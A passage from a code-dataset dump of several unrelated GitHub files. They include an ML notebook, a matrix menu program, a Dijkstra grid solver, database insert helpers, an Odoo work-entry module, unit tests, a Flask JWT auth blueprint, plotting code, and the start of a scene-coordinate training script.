RandomForestClassifier(max_depth= 5, random_state = 42) \nmodelo.fit(X_train, y_train)\n\n\n# In[32]:\n\n\ny_test\n\n\n# In[33]:\n\n\nacuracia = modelo.score(X_test, y_test)\nprint('Acurácia:', acuracia)\n\n\n# 
In[34]:\n\n\n# Gerar o score para cada cliente\n#score = modelo.predict_proba(X_test)[:, 1].round()\nscore = modelo.predict_proba(X_test)[:, 1]\n\n\n# In[35]:\n\n\n#from sklearn import metrics\n'''\nprint(\"Acurácia:\",metrics.accuracy_score(y_test, score))\nprint(\"Precisão:\",metrics.precision_score(y_test, score))\nprint(\"Recall:\",metrics.recall_score(y_test, score)) \nprint(\"F1:\",metrics.f1_score(y_test, score))\n'''\n\n\n# In[36]:\n\n\nscore\n\n\n# In[37]:\n\n\n# Fornecer produtos financeiros com base no score gerado e nas variáveis adicionais\nproduto_oferecido = np.where((score >= 0.8), 'Empréstimo Pessoal', np.where((score >= 0.5) , 'Cartão de Crédito', np.where((score >= 0.2) , 'Conta Corrente', 'Sem Oferta')))\n\n\n# In[38]:\n\n\nproduto_oferecido.shape\n\n\n# In[39]:\n\n\nproduto_oferecido\n\n\n# In[40]:\n\n\ndf_teste = pd.DataFrame(produto_oferecido, columns = ['produto_oferecido'])\n\n\n# In[41]:\n\n\ndf_teste\n\n\n# In[42]:\n\n\n#produtos ofertados\ndf_teste['produto_oferecido'].value_counts()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Rodrigo-Henrique21/Machine-Learning-Hackathon-Bradesco","sub_path":"model_bradesco_hacka.py","file_name":"model_bradesco_hacka.py","file_ext":"py","file_size_in_byte":5874,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28767698639","text":"# Вариант 4,2\n\n# Программа предназначена для выполнения действий с матрицей\n\n# Входные данные: номер команды, который стоит применить к матрице\n\n# Выходные данные: проделывание операции с матрицей\n\n\n# Функция проверки на int\ndef str_is_int(massive_item):\n if len(massive_item) == 0:\n return False\n if massive_item == '0':\n return True\n length = len(massive_item)\n if length >= 2 and massive_item[:2] == '-0':\n return False\n for i in range(length):\n # Если начинается с 0, то неверный ввод\n if i == 0 and massive_item[i] == '0':\n return False\n # Проверка на знаки, отличные от '-', '.'\n if not massive_item[i].isdecimal():\n # Если '-' первый символ, то это просто число\n if massive_item[i] == '-' and i == 0 and not length == 1:\n continue\n # Все остальное некорректный ввод\n else:\n return False\n return True\n\n\n# Инициализация переменных\nmassive = []\nflag = True\n\nwhile flag:\n # Меню\n print('''\n-----------------------------------------------------------------------------------------------\n| 1) Ввести матрицу |\n| 2) Добавить строку |\n| 3) Удалить строку |\n| 4) Добавить столбец |\n| 5) Удалить столбец |\n| 6) Найти строку, имеющую наименьшее количество четных элементов |\n| 7) Переставить местами строки с наибольшим и наименьшим количеством отрицательных элементов |\n| 8) Найти столбец, имеющий наименьшее количество отрицательных элементов |\n| 9) Переставить местами столбцы с максимальной и минимальной суммой элементов |\n| 10) Вывести текущую матрицу |\n-----------------------------------------------------------------------------------------------\n ''')\n\n # Ввод и проверка номера операции на допустимое значение\n operation = input('Выберете номер операции от 1 до 10 или введите 0, чтобы выйти: ').strip()\n while not operation.isdecimal() or not 1 <= int(operation) <= 10:\n if operation == '0':\n flag = False\n break\n print('Неправильный номер операции')\n operation = input('Выберете номер операции от 1 до 10 или введите 0, чтобы выйти: ').strip()\n operation = int(operation)\n\n if operation == 1:\n # Очистка массива\n massive.clear()\n # Инициализация длины и высоты\n length = input('Введите длину матрицы: 
').strip()\n while not length.isdecimal() or int(length) == 0:\n print('Некорректное число')\n length = input('Введите длину матрицы: ').strip()\n length = int(length)\n width = input('Введите высоту матрицы: ').strip()\n while not width.isdecimal() or int(width) == 0:\n print('Некорректное число')\n width = input('Введите высоту матрицы: ').strip()\n width = int(width)\n # Ввод элементов\n for i in range(width):\n massive.append([])\n for j in range(length):\n element = input(f'Введите элемент номер {j + 1} в строку номер {i + 1}: ').strip()\n while not str_is_int(element):\n print('Некорректное число')\n element = input(f'Введите элемент номер {j + 1} в строку номер {i + 1}: ').strip()\n massive[i].append(int(element))\n\n elif operation == 2:\n # Добавления строки любой длины\n if len(massive) == 0:\n massive.append([])\n check_str = input('Введите элементы новой строки через пробел: ').split()\n # Проверка каждого символа на корректность\n for i in range(len(check_str)):\n # Вводить значение, пока оно не будет корректно\n while not str_is_int(check_str[i]):\n print(f'Элемент номер {i + 1} введен некорректно')\n check_str[i] = input(f'Повторите ввод элемента номер {i + 1}: ').strip()\n massive[0].append(int(check_str[i]))\n else:\n # Инициализация элемента\n new_str = []\n place = input('Введите место, в которое нужно вставить строку: ').strip()\n while not place.isdecimal() or not 1 <= int(place) <= len(massive) + 1:\n print('Неправильный номер строки')\n place = input(f'Введите место для строки из промежутка [1, {len(massive) + 1}]: ').strip()\n place = int(place)\n # Добавление строки определенной длины\n for i in range(len(massive[0])):\n str_element = input(f'Введите элемент номер {i + 1}: ').strip()\n while not str_is_int(str_element):\n print('Некорректное число')\n str_element = input(f'Введите элемент номер {i + 1}: ').strip()\n new_str.append(int(str_element))\n command = input('Нажмите 1, чтобы добавить строку алгоритмически, или 2, чтобы добавить ее с помощью insert(): ').strip()\n while not (command == '1' or command == '2'):\n print('Неправилльный номер команды')\n command = input('Нажмите 1, чтобы добавить строку алгоритмически, или 2, чтобы добавить ее с помощью insert(): ').strip()\n # Выбор алгоритма добавления\n if command == '1':\n massive.append(new_str)\n # Перемещение элемента на нужное место\n for i in range(len(massive) - 1, place - 1, -1):\n massive[i - 1], massive[i] = massive[i], massive[i - 1]\n else:\n massive.insert(place - 1, new_str)\n\n elif operation == 3:\n if len(massive) == 0:\n print('Невозможно выполнить операцию: матрица пустая')\n else:\n # Ввод и проверка номера элемента на допустимое значение\n element = input('Введите номер строки, которую стоит удалить: ').strip()\n while not element.isdecimal() or not 1 <= int(element) <= len(massive):\n print('Неправильный номер строки')\n element = input(f'Введите номер строки из промежутка [1, {len(massive)}], которую стоит удалить: ').strip()\n element = int(element)\n command = input('Нажмите 1, чтобы удалить строку алгоритмически, или 2, чтобы удалить ее с помощью pop(): ').strip()\n while not (command == '1' or command == '2'):\n print('Неправилльный номер команды')\n command = input('Нажмите 1, чтобы удалить строку алгоритмически, или 2, чтобы удалить ее с помощью pop(): ').strip()\n # Перемещение элемента в конец и обрезка\n if command == '1':\n for i in range(element - 1, len(massive) - 1):\n massive[i] = massive[i + 1]\n massive.pop()\n else:\n massive.pop(element - 1)\n\n elif operation == 4:\n 
# Добавление столбца любой длины\n if len(massive) == 0:\n check_column = input('Введите элементы нового столбца через пробел: ').split()\n # Проверка каждого символа на корректность\n for i in range(len(check_column)):\n # Вводить значение, пока оно не будет корректно\n while not str_is_int(check_column[i]):\n print(f'Элемент номер {i + 1} введен некорректно')\n check_column[i] = input(f'Повторите ввод элемента номер {i + 1}: ').strip()\n check_column[i] = int(check_column[i])\n for i in range(len(check_column)):\n massive.append([])\n massive[i].append(check_column[i])\n else:\n # Инициализация элемента\n new_column = []\n place = input('Введите место, в которое нужно вставить столбец: ').strip()\n while not place.isdecimal() or not 1 <= int(place) <= len(massive[0]) + 1:\n print('Неправильный номер столбца')\n place = input(f'Введите место для столбца из промежутка [1, {len(massive[0]) + 1}]: ').strip()\n place = int(place)\n # Добавление столбца определенной длины\n for i in range(len(massive)):\n column_element = input(f'Введите элемент номер {i + 1}: ').strip()\n while not str_is_int(column_element):\n print('Некорректное число')\n column_element = input(f'Введите элемент номер {i + 1}: ').strip()\n new_column.append(int(column_element))\n command = input('Нажмите 1, чтобы добавить столбец алгоритмически, или 2, чтобы добавить его с помощью insert(): ').strip()\n while not (command == '1' or command == '2'):\n print('Неправилльный номер команды')\n command = input('Нажмите 1, чтобы добавить столбец алгоритмически, или 2, чтобы добавить его с помощью insert(): ').strip()\n # Выбор алгоритма добавления\n if command == '1':\n for i in range(len(massive)):\n massive[i].append(new_column[i])\n # Перемещение элемента на нужное место\n for i in range(len(massive) - 1, place - 1, -1):\n for j in range(len(massive[0])):\n massive[i][j - 1], massive[i][j] = massive[i][j], massive[i][j - 1]\n else:\n for i in range(len(massive)):\n massive[i].insert(place - 1, new_column[i])\n\n elif operation == 5:\n if len(massive) == 0:\n print('Невозможно выполнить операцию: матрица пустая')\n else:\n # Ввод и проверка номера элемента на допустимое значение\n element = input('Введите номер столбца, который стоит удалить: ').strip()\n while not element.isdecimal() or not 1 <= int(element) <= len(massive[0]):\n print('Неправильный номер стролбца')\n element = input(f'Введите номер столбца из промежутка [1, {len(massive[0])}], который стоит удалить: ').strip()\n element = int(element)\n command = input('Нажмите 1, чтобы удалить столбец алгоритмически, или 2, чтобы удалить его с помощью pop(): ').strip()\n while not (command == '1' or command == '2'):\n print('Неправилльный номер команды')\n command = input('Нажмите 1, чтобы удалить столбец алгоритмически, или 2, чтобы удалить его с помощью pop(): ').strip()\n # Перемещение элемента в конец и обрезка\n if command == '1':\n for i in range(len(massive)):\n for j in range(element - 1, len(massive[0]) - 1):\n massive[i][j] = massive[i][j + 1]\n massive[i].pop()\n else:\n for i in range(len(massive)):\n massive[i].pop(element - 1)\n\n elif operation == 6:\n if len(massive) == 0:\n print('Невозможно выполнить операцию: матрица пустая')\n elif len(massive) == 1:\n print(f'Строка с наименьшим количеством четных элементов: {massive[0]}')\n else:\n min_str = 0\n min_count = len(massive[0])\n # Проход по строкам\n for i in range(len(massive)):\n count = 0\n for j in range(len(massive[0])):\n if massive[i][j] % 2 == 0:\n count += 1\n if count < min_count:\n min_count = 
count\n                    min_str = i\n            print(f'Строка с наименьшим количеством четных элементов: {massive[min_str]}')\n\n    elif operation == 7:\n        if len(massive) == 0:\n            print('Невозможно выполнить операцию: матрица пустая')\n        elif len(massive) == 1:\n            print('Невозможно выполнить операцию: в матрице одна строка')\n        else:\n            max_num_str = -1\n            i_max_str = 0\n            i_min_str = 0\n            min_num_str = len(massive[0]) + 1\n            # Проход по всем строкам, переопределение минимума и максимума\n            for i in range(len(massive)):\n                tek_num_str = 0\n                for j in range(len(massive[0])):\n                    if massive[i][j] < 0:\n                        tek_num_str += 1\n                if tek_num_str < min_num_str:\n                    min_num_str = tek_num_str\n                    i_min_str = i\n                if tek_num_str > max_num_str:\n                    max_num_str = tek_num_str\n                    i_max_str = i\n            # Перемещение строк\n            massive[i_min_str], massive[i_max_str] = massive[i_max_str], massive[i_min_str]\n    \n    elif operation == 8:\n        if len(massive) == 0:\n            print('Невозможно выполнить операцию: матрица пустая')\n        else:\n            min_num_col = len(massive[0])\n            j_min_col_sum = 0\n            # Проход по каждому элементу столбца и переопределение минимума\n            for j in range(len(massive[0])):\n                tek_num_col = 0\n                for i in range(len(massive)):\n                    if massive[i][j] < 0:\n                        tek_num_col += 1\n                if tek_num_col < min_num_col:\n                    min_num_col = tek_num_col\n                    j_min_col_sum = j\n            answer = '['\n            # Запись нужного столбца в ответ\n            for i in range(len(massive)):\n                answer += f'{massive[i][j_min_col_sum]}, '\n            answer = answer.rstrip(', ') + ']'\n            print('Столбец с минимальным количеством отрицательных элементов:', answer)\n\n    elif operation == 9:\n        if len(massive) == 0:\n            print('Невозможно выполнить операцию: матрица пустая')\n        elif len(massive[0]) == 1:\n            print('Невозможно выполнить операцию: в матрице один столбец')\n        else:\n            max_sum_col = 0\n            # Проход по первому столбцу для инициализации минимума и максимума\n            for i in range(len(massive)):\n                max_sum_col += massive[i][0]\n            j_max_col = 0\n            j_min_col = 0\n            min_sum_col = max_sum_col\n            # Проход по остальным столбцам, переопределение минимума и максимума\n            for j in range(1, len(massive[0])):\n                tek_sum_col = 0\n                for i in range(len(massive)):\n                    tek_sum_col += massive[i][j]\n                if tek_sum_col > max_sum_col:\n                    max_sum_col = tek_sum_col\n                    j_max_col = j\n                if tek_sum_col < min_sum_col:\n                    min_sum_col = tek_sum_col\n                    j_min_col = j\n            # Перемещение элементов в каждой строке\n            for i in range(len(massive)):\n                massive[i][j_min_col], massive[i][j_max_col] = massive[i][j_max_col], massive[i][j_min_col]\n\n    elif operation == 10:\n        if len(massive) == 0:\n            print(f'Текущий массив: {massive}')\n        # Прохождение по каждому элементу и создание строки ответа\n        for i in range(len(massive)):\n            line = ''\n            for j in range(len(massive[0])):\n                line += f'[{massive[i][j]:>4}]'\n            if i == 0:\n                line = 'Текущий массив: ' + line\n            else:\n                line = ' ' * 16 + line\n            print(line)","repo_name":"LockeRL/Python","sub_path":"Sem1/lab8.py","file_name":"lab8.py","file_ext":"py","file_size_in_byte":19468,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5664413126","text":"import collections\nimport heapq\n\nclass PriorityQueue:\n    def __init__(self):\n        self.elements = []\n    \n    def empty(self):\n        return len(self.elements) == 0\n    \n    def put(self, item, priority):\n        heapq.heappush(self.elements, (priority, item))\n    \n    def get(self):\n        return heapq.heappop(self.elements)[1]\n\nclass Queue:\n    def __init__(self):\n        self.elements = collections.deque()\n    \n    def empty(self):\n        return len(self.elements) == 0\n    \n    def put(self, x):\n        self.elements.append(x)\n    \n    def get(self):\n        return 
self.elements.popleft()\n\n \nclass SimpleGraph:\n def __init__(self):\n self.edges = {}\n \n def neighbors(self, id):\n return self.edges[id]\n\n\nclass SquareGrid:\n def __init__(self, width, height):\n self.width = width\n self.height = height\n self.walls = []\n \n def in_bounds(self, id):\n (x, y) = id\n return 0 <= x < self.width and 0 <= y < self.height\n \n def passable(self, id):\n return id not in self.walls\n \n def neighbors(self, id):\n (x, y) = id\n results = [(x+1, y), (x, y-1), (x-1, y), (x, y+1)]\n if (x + y) % 2 == 0: results.reverse() # aesthetics\n results = filter(self.in_bounds, results)\n results = filter(self.passable, results)\n return results\n\nclass GridWithWeights(SquareGrid):\n def __init__(self, width, height):\n super().__init__(width, height)\n self.weights = {}\n \n def cost(self, from_node, to_node):\n return self.weights.get(to_node,1)\n\nexample_graph = SimpleGraph()\nexample_graph.edges = {\n 'A': ['B'],\n 'B': ['A', 'C', 'D'],\n 'C': ['A'],\n 'D': ['E', 'A'],\n 'E': ['B']\n}\n\ndef breadth_first_search(graph, start, goal):\n frontier = Queue()\n frontier.put(start)\n came_from = {}\n came_from[start] = None\n \n while not frontier.empty():\n current = frontier.get()\n \n if current == goal:\n break\n \n for next in graph.neighbors(current):\n if next not in came_from:\n frontier.put(next)\n came_from[next] = current\n \n return came_from\n\ndef from_id_width(id, *, width):\n return (id % width, id // width)\n\ndef draw_grid(graph, width=2, **style):\n for y in range(graph.height):\n for x in range(graph.width):\n print(\"%%-%ds\" % width % draw_tile(graph, (x, y), style, width), end=\"\")\n print()\n\ndef draw_tile(graph, id, style, width):\n r = \".\"\n if 'number' in style and id in style['number']: r = \"%d\" % style['number'][id]\n if 'point_to' in style and style['point_to'].get(id, None) is not None:\n (x1, y1) = id\n (x2, y2) = style['point_to'][id]\n if x2 == x1 + 1: r = \"\\u2192\"\n if x2 == x1 - 1: r = \"\\u2190\"\n if y2 == y1 + 1: r = \"\\u2193\"\n if y2 == y1 - 1: r = \"\\u2191\"\n if 'start' in style and id == style['start']: r = \"A\"\n if 'goal' in style and id == style['goal']: r = \"Z\"\n if 'path' in style and id in style['path']:\n r = \"@\"\n LPath.append(id)\n if id in graph.walls: r = \"#\" * width\n return r\n\ndef dijkstra_search(graph, start, goal):\n frontier = PriorityQueue()\n frontier.put(start, 0)\n came_from = {}\n cost_so_far = {}\n came_from[start] = None\n cost_so_far[start] = 0\n \n while not frontier.empty():\n current = frontier.get()\n \n if current == goal:\n break\n \n for next in graph.neighbors(current):\n new_cost = cost_so_far[current] + graph.cost(current, next)\n if next not in cost_so_far or new_cost < cost_so_far[next]:\n cost_so_far[next] = new_cost\n priority = new_cost\n frontier.put(next, priority)\n came_from[next] = current\n \n return came_from, cost_so_far\n\ndef reconstruct_path(came_from, start, goal):\n current = goal\n path = [current]\n while current != start:\n current = came_from[current]\n path.append(current)\n path.reverse()\n return path\n\n\"\"\"DIAGRAM1_WALLS = [from_id_width(id, width=30) for id in [21,22,51,52,81,82,93,94,111,112,123,124,133,134,141,142,153,154,163,164,171,172,173,174,175,183,184,193,194,201,202,203,204,205,213,214,223,224,243,244,253,254,273,274,283,284,303,304,313,314,333,334,343,344,373,374,403,404,433,434]]\n\ng = SquareGrid(30, 15)\ng.walls = DIAGRAM1_WALLS\n\nparents = breadth_first_search(g, (8, 7), (17,2))\ndraw_grid(g, width=2, point_to=parents, 
start=(8, 7), goal = (17,2))\nprint()\n\ndiagram4 = GridWithWeights(10, 10)\ndiagram4.walls = [(1, 7), (1, 8), (2, 7), (2, 8), (3, 7), (3, 8)]\ndiagram4.weights = {loc: 5 for loc in [(3, 4), (3, 5), (4, 1), (4, 2),\n (4, 3), (4, 4), (4, 5), (4, 6), \n (4, 7), (4, 8), (5, 1), (5, 2),\n (5, 3), (5, 4), (5, 5), (5, 6), \n (5, 7), (5, 8), (6, 2), (6, 3), \n (6, 4), (6, 5), (6, 6), (6, 7), \n (7, 3), (7, 4), (7, 5)]}\n\ncame_from, cost_so_far = dijkstra_search(diagram4, (1, 4), (7, 8))\ndraw_grid(diagram4, width=3, point_to=came_from, start=(1, 4), goal=(7, 8))\nprint()\ndraw_grid(diagram4, width=3, number=cost_so_far, start=(1, 4), goal=(7, 8))\nprint()\ndraw_grid(diagram4, width=3, path=reconstruct_path(came_from, start=(1, 4), goal=(7, 8)))\"\"\"\n\nf = open(\"PEuler83.txt\", \"r\")\n\nL1 = []\n\nlines = f.readlines()\n\nfor line in lines:\n lineList = line.split(',')\n lineList[-1] = lineList[-1][:-1]\n for x in range(len(lineList)):\n lineList[x] = int(lineList[x])\n L1.append(lineList)\n\n\"\"\"L1 = [[131,673,234,103,18],\n [201,96,342,965,150],\n [630,803,746,422,111],\n [537,699,497,121,956],\n [805,732,524,37,331]]\"\"\"\n\nLPath = []\n\npeuler83 = GridWithWeights(len(L1),len(L1))\nweightDic = {}\nfor x in range(len(L1)):\n for y in range(len(L1)):\n weightDic[(x,y)] = L1[x][y]\n\npeuler83.weights = weightDic\nprint()\ncame_from, cost_so_far = dijkstra_search(peuler83, (0,0) , (len(L1)-1,len(L1)-1))\ndraw_grid(peuler83, width=2, point_to=came_from, start=(0,0), goal = (len(L1)-1,len(L1)-1))\nprint()\ndraw_grid(peuler83, width=2, number=cost_so_far, start=(0, 0), goal=(len(L1)-1, len(L1)-1))\nprint()\ndraw_grid(peuler83, width=2, path=reconstruct_path(came_from, start=(0,0), goal=(len(L1)-1, len(L1)-1)))\n\ncounter = 0\n\nfor x in LPath:\n counter += L1[x[0]][x[1]]\nprint()\nprint(counter)\n","repo_name":"arashrai/Algorithms-Functions","sub_path":"AStar.py","file_name":"AStar.py","file_ext":"py","file_size_in_byte":6579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10412351765","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/10/16/016 15:29\n# @Author : K_oul\n# @File : to_db.py\n# @Software: PyCharm\nimport datetime\nimport uuid\nfrom app.db.db import MySQL\n\nmy_db = MySQL()\n\ndef buyin_to_db(result, token):\n data = {\n 'token': token,\n 'showId': result.get('showId'),\n 'strNick': result.get('strNick'),\n 'gameRoomName': str(result.get('gameRoomName').encode()),\n 'gameRoomId': result.get('gameRoomId'),\n 'buyStack': result.get('buyStack'),\n 'uuid': result.get('uuid'),\n 'totalBuyin': result.get('totalBuyin'),\n 'totalProfit': result.get('totalProfit'),\n 'update_time': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n 'status': 0,\n }\n\n my_db.insert('check_buyin', data)\n\n\ndef history_to_db(history_list, club_id):\n zj_list = [int(i[20]) for i in history_list[1:]]\n zj_max = max(zj_list)\n max_counts = zj_list.count(zj_max)\n zj_min = min(zj_list)\n min_counts = list(zj_list).count(zj_min)\n for temp in history_list[1:]:\n if temp[11] == club_id:\n ismvp = 0\n count_mvp = 0\n if int(temp[20]) == zj_max:\n ismvp = 1\n count_mvp = max_counts\n elif int(temp[20]) == zj_min:\n ismvp = 2\n count_mvp = min_counts\n\n data = {\n 'ID': str(uuid.uuid1()),\n 'room_id': temp[2],\n 'union_account': temp[12],\n 'paiju_type': temp[0],\n 'paiju_name': str(temp[1].encode()),\n 'jianjuzhe_name': temp[3],\n 'mangzhu': temp[4],\n 'table': temp[6],\n 'shichang': temp[7],\n 'shoushu': temp[8],\n 
'player_id': temp[9],\n 'player_name': temp[10],\n 'union_id': temp[11],\n 'union_name': temp[12],\n 'mairu': temp[13],\n 'daichu': temp[14],\n 'baoxian_mairu': temp[15],\n 'baoxian_shouru': temp[16],\n 'baoxian_total': temp[17],\n 'baoxian_club': temp[18],\n 'baoxian': temp[19],\n 'zhanji': temp[20],\n 'over_time': temp[21],\n 'update_time': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n 'encode_paiju_name': str(temp[1].encode()),\n 'status': 0,\n 'ismvp': ismvp,\n 'count_mvp': count_mvp,\n }\n print(data)\n my_db.insert('auto_import', data)\n","repo_name":"k-oul/game_login","sub_path":"app/db/to_db.py","file_name":"to_db.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15831362209","text":"from datetime import timedelta\r\nimport pytz\r\n\r\nfrom odoo import models, fields, api, _\r\nfrom odoo.exceptions import UserError\r\n\r\n\r\nclass HrWorkEntry(models.Model):\r\n _inherit = 'hr.work.entry'\r\n\r\n def sync_wrk_entries_biotime(self):\r\n from_date = self.env.context.get('default_date_start', False)\r\n end_date = self.env.context.get('default_date_end', False)\r\n\r\n if from_date and end_date:\r\n from_date = fields.Datetime.to_datetime(from_date)\r\n end_date = fields.Datetime.to_datetime(end_date + ' 23:59:59')\r\n atts = self.env['hr.attendance'].search([])\r\n\r\n if atts.filtered(lambda rec: not rec.check_in or not rec.check_out):\r\n raise UserError(\r\n \"Veuillez remplir les fiches de présences correctement.\")\r\n\r\n atts = atts.filtered(\r\n lambda rec: rec.check_in and rec.check_out and rec.check_in >= from_date and rec.check_out <= end_date)\r\n else:\r\n atts = self.env['hr.attendance'].search([])\r\n\r\n for att in atts:\r\n local_att_check_in = pytz.utc.localize(att.check_in, is_dst=None).astimezone(\r\n pytz.timezone(self.env.user.partner_id.tz or 'GMT'))\r\n local_att_check_out = pytz.utc.localize(att.check_out, is_dst=None).astimezone(\r\n pytz.timezone(self.env.user.partner_id.tz or 'GMT'))\r\n\r\n shift_line = att.employee_id.biotime_shift_id.biotime_shift_lines.filtered(\r\n lambda shift_line: int(shift_line.day_in) == local_att_check_in.weekday() and int(shift_line.day_out) == local_att_check_out.weekday())\r\n\r\n if shift_line and shift_line.ensure_one():\r\n margin_check_in = (shift_line.check_in_end -\r\n shift_line.check_in_start)\r\n margin_check_out = (shift_line.check_out_end -\r\n shift_line.check_out_start)\r\n\r\n eq_wrk_entry = self.env['hr.work.entry'].search([\r\n ('employee_id', '=', att.employee_id.id),\r\n ('date_start', '>=', att.check_in -\r\n timedelta(hours=margin_check_in)),\r\n ('date_stop', '<=', att.check_out +\r\n timedelta(hours=margin_check_out)),\r\n ('state', '=', 'draft')\r\n ])\r\n\r\n if eq_wrk_entry:\r\n work_entry_type_id = self.env['hr.work.entry.type'].search(\r\n [('code', '=', 'WORK100')])\r\n eq_wrk_entry[0].write({\r\n 'name': str(work_entry_type_id.name) + ' : ' + str(att.employee_id.name),\r\n 'date_start': att.check_in,\r\n 'work_entry_type_id': work_entry_type_id.id,\r\n 'state': 'validated'\r\n })\r\n eq_wrk_entry[-1].write({\r\n 'name': str(work_entry_type_id.name) + ' : ' + str(att.employee_id.name),\r\n 'work_entry_type_id': work_entry_type_id.id,\r\n # Allow user to aproove overtimes\r\n 'date_end': att.check_out if not att.overtime else eq_wrk_entry[-1].date_end,\r\n 'state': 'validated'\r\n 
})\r\n","repo_name":"Conscior/biotime_hr_work_entry","sub_path":"models/hr_work_entry.py","file_name":"hr_work_entry.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26193664467","text":"import pytest\nfrom random import randint\nfrom math import sqrt\nfrom mypkg.advanced_data_structures.sqrt_decomposition.sqrt_RAQ import BucketRAQ\n\n\ndef test_BucketRAQ():\n \"\"\"\n 1 <= size <= M のサイズの列を Iteration 回ランダム生成し、それぞれについて Iteration 回ランダムクエリを投げる。\n クエリへの回答を愚直に更新したものと比較するテストを行う。\n \"\"\"\n with pytest.raises(ValueError):\n BucketRAQ(total_size=100, chunk_size=101) # invalid chunk size\n with pytest.raises(IndexError):\n raq = BucketRAQ(100, chunk_size=10)\n raq.range_add(-1, 50, 1000) # invalid slices\n \n Iteration = 50\n M = 50\n for _ in range(Iteration):\n size = randint(1, M)\n chunk_size = randint(int(sqrt(size)), size)\n L = [randint(-100, 100) for _ in range(size)]\n raq = BucketRAQ(size, chunk_size)\n raq.build(L)\n\n for _ in range(Iteration):\n if randint(0, 1) == 0:\n # 範囲の加算クエリ\n l = randint(0, size)\n r = randint(l, size)\n num = randint(-100, 100)\n raq.range_add(l, r, num)\n for i in range(l, r):\n L[i] += num\n else:\n # 1 点の質問クエリ\n ind = randint(0, size - 1)\n assert raq.get(ind) == L[ind]\n\n\n\nif __name__ == \"__main__\":\n pytest.main(['-v', __file__])\n","repo_name":"ikeshou/Kyoupuro_library_python","sub_path":"tests/advanced_data_structures/sqrt_decomposition/test_sqrt_RAQ.py","file_name":"test_sqrt_RAQ.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14104594647","text":"from flask import Blueprint, jsonify, request\nfrom cinema.models.user import User\nfrom cinema.utils.jwt import create_user_and_get_token, get_token_or_exception, token_required\nfrom cinema.utils.validators import validate_auth_request_body\nfrom cinema.utils.custom_errors import ResourceAlreadyExistsError, UnauthorizedError, ValidationError, ResourceDoesNotExistError\n\n\nauth_bp = Blueprint(\"auth\", __name__, url_prefix=\"auth\")\n\n\n@auth_bp.route('register', methods=(['POST']))\ndef register():\n body: dict = request.json\n try:\n valid_body = validate_auth_request_body(body)\n token = create_user_and_get_token(valid_body)\n except (ValidationError, ResourceAlreadyExistsError) as e:\n return jsonify({\"message\": str(e)}), e.code\n\n return jsonify({\"token\": token})\n\n\n@auth_bp.route('login', methods=(['POST']))\ndef login():\n body: dict = request.json\n try:\n valid_body = validate_auth_request_body(body)\n token = get_token_or_exception(valid_body)\n except (ValidationError, ResourceDoesNotExistError, UnauthorizedError) as e:\n return jsonify({\"message\": str(e)}), e.code\n\n return jsonify({\"token\": token})\n\n\n@auth_bp.route('user')\n@token_required\ndef get_user(current_user: User):\n return jsonify({\"username\": current_user.username})\n","repo_name":"Marat5/cinema","sub_path":"backend/cinema/views/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"20830194655","text":"import matplotlib.pyplot as plt \nimport json\nimport statistics\nimport random\n\nresultsDir = '../results/'\nblocks = {}\n\nfor i in [20,40,60,80]:\n with open(resultsDir + str(i) + '.json', 'r') as reader:\n data = []\n j = 0\n for line in reader.readlines():\n if j == 
1000:\n                break\n            entry = json.loads(line)\n            data.append((entry['blockNum'],entry['ceilingLossAtPercentile']))\n            j = j + 1\n        \n        plt.plot([x[0] for x in data],[x[1] for x in data], label=str(i) + 'Nth Percentile')\n\n    # data.sort(key=lambda x : x['blockNum'], reverse=True)\n    # blocks = list(map(lambda x : x['blockNum'], data))\n    # cost = list(map(lambda x : x['ceilingLossAtPercentile'], data)) \n    # plt.bar(i, median, align='center', width=5) \n\nplt.legend(loc=1)\nplt.xlabel('Blocks #') \nplt.ylabel('Loss (ETH)') \n# plt.title('')\nplt.xticks([])\nplt.savefig('test.png')\n\n","repo_name":"thedarkspy/eth-analysis","sub_path":"eth_analysis/plot-results.py","file_name":"plot-results.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"28990546309","text":"import torch\nimport torch.optim as optim\n\nimport time\nimport argparse\n\nfrom dataset import CamLocDataset\nfrom network import Network\nimport util\n\nparser = argparse.ArgumentParser(\n\tdescription='Train scene coordinate regression using target scene coordinates.',\n\tformatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\nparser.add_argument('scene', help='name of a scene in the dataset folder')\n\nparser.add_argument('network', help='output file name for the network')\n\nparser.add_argument('--learningrate', '-lr', type=float, default=0.0001, \n\thelp='learning rate')\n\nparser.add_argument('--iterations', '-iter', type=int, default=500000,\n\thelp='number of training iterations, i.e. number of model updates')\n\nparser.add_argument('--softclamp', '-sc', type=float, default=10, \n\thelp='robust square root loss after this threshold, in meters')\n\nparser.add_argument('--hardclamp', '-hc', type=float, default=1000, \n\thelp='clamp loss with this threshold, in meters')\n\nparser.add_argument('--session', '-sid', default='',\n\thelp='custom session name appended to output files, useful to separate different runs of a script')\n\nopt = parser.parse_args()\n\ntrainset = CamLocDataset(\"./dataset/\" + opt.scene + \"/train\")\ntrainset_loader = torch.utils.data.DataLoader(trainset, shuffle=True, num_workers=6)\n\nprint(\"Found %d training images for %s.\" % (len(trainset), opt.scene))\n\nprint(\"Calculating mean scene coordinate for the scene...\")\n\nmean = torch.zeros((3))\ncount = 0\n\nfor image, gt_pose, gt_coords, focal_length, file in trainset_loader:\n\n\tgt_coords = gt_coords[0]\n\tgt_coords = gt_coords.view(3, 